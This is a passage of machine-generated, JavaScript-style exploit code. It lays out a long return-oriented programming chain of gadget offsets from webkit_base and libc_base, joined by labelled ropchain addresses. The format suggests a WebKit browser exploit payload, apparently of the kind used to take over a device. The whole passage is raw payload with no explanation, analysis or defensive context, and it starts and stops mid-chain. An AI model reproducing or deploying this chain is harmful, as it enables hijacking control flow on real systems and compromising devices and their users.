webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+459888, //L9865
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9865:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9866:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+459984, //L9867
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9867:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9869:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+460104, //L9872
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+460088, //L9870
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9870:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9872:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+460280, //L9875
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+460296, //L9876
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+460248, //L9873
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+460264, //L9874
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9873:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9874:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9875:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9876:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+460392, //L9878
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+460376, //L9877
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9877:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9878:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+460472, //L9879
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9879:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9881:
db([4294967252, 4294967295]); // -0x2c
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+460592, //L9884
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+460576, //L9882
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9882:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9884:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+460768, //L9887
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+460784, //L9888
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+460736, //L9885
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+460752, //L9886
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9885:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9886:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9887:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9888:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+460944, //L9892
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+460912, //L9890
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+460928, //L9891
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9889:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L9890:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9891:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9892:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+461048, //L9894
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+461032, //L9893
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9893:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9894:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+461128, //L9895
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9895:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9897:
db([4294967228, 4294967295]); // -0x44
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+461248, //L9900
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+461232, //L9898
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9898:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9900:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+461424, //L9903
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+461440, //L9904
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+461392, //L9901
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+461408, //L9902
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9901:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9902:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9903:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9904:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+461520, //L9905
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+461536, //L9906
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9905:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9906:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+461632, //L9908
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+461616, //L9907
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9907:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9908:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+461712, //L9909
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L9909:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9910:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9911:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+461856, //L9912
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+461888, //L9914
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+461872, //L9913
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9912:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9913:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9914:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+462000, //L9916
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L9915:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9916:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+462104, //L9917
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L9917:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9918:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9919:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+462232, //L9921
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+462216, //L9920
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9920:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9921:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+462312, //L9922
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9922:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9924:
db([4294967228, 4294967295]); // -0x44
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+462432, //L9927
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+462416, //L9925
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9925:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9927:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+462608, //L9930
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+462624, //L9931
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+462576, //L9928
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+462592, //L9929
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9928:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9929:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9930:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9931:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+462704, //L9932
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+462720, //L9933
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9932:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9933:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+462832, //L9934
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+462864, //L9936
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+462848, //L9935
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9934:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9935:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9936:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+463040, //L9938
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+463056, //L9939
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+463024, //L9937
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L9937:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9938:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9939:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+463168, //L9941
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+463216, //L9944
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+463184, //L9942
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L9941:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9942:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9943:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9944:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+463328, //L9945+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+463320, //L9945
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L9945:
db([0, 0]); // 0x0
set_gadgets([
ropchain+463344, //L9945+24
ropchain+463816, //L9940
libc_base+764760, //pop rsi
ropchain+463384, //L9946
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9946:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9948:
db([4294967228, 4294967295]); // -0x44
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+463504, //L9951
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+463488, //L9949
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9949:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9951:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+463680, //L9954
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+463696, //L9955
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+463648, //L9952
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+463664, //L9953
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9952:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9953:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9954:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9955:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+463792, //L9958
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+463776, //L9957
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9957:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9958:
db([0, 0]); // 0x0
set_gadgets([
libc_base+782311, //pop rsp
ropchain+464408, //L9956
//L9940:
libc_base+759608 //pop rax
]);
//L9959:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+463904, //L9960
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9960:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9962:
db([4294967228, 4294967295]); // -0x44
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+464024, //L9965
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+464008, //L9963
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9963:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9965:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+464200, //L9968
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+464216, //L9969
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+464168, //L9966
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+464184, //L9967
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9966:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9967:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9968:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9969:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+464328, //L9970
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+464360, //L9972
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+464344, //L9971
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9970:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9971:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9972:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
//L9956:
libc_base+764760, //pop rsi
ropchain+464520, //L9974
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+464536, //L9975
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+464504, //L9973
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L9973:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9974:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9975:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+464696, //L9979
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+464664, //L9977
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+464680, //L9978
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9976:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L9977:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9978:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9979:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+464800, //L9981
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+464784, //L9980
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9980:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9981:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+464880, //L9982
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9982:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9984:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+465000, //L9987
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+464984, //L9985
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9985:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9987:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+465144, //L9990
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+465112, //L9988
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+465128, //L9989
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9988:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9989:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9990:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+465224, //L9991
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9991:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9993:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+465344, //L9996
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+465328, //L9994
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9994:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9996:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+465488, //L9999
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+465456, //L9997
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+465472, //L9998
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9997:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9998:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9999:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+465568, //L10000
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10000:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10002:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+465688, //L10005
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+465672, //L10003
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10003:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10005:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+465832, //L10008
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+465800, //L10006
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+465816, //L10007
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10006:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10007:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10008:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
